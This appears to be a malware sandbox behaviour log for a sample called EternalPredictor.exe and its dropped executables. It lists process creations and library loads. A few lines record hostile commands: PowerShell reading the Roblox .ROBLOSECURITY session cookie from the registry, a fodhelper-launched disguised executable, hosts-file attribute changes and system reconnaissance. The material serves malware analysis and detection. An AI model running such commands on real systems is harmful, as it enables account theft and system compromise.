                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP"
                        Source: C:\Windows\System32\fodhelper.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: version.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Section loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: python3.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: libffi-8.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: sqlite3.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: libcrypto-3.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: libssl-3.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: dciman32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: winmmbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: mmdevapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: ksuser.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: avrt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: audioses.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: msacm32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: midimap.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
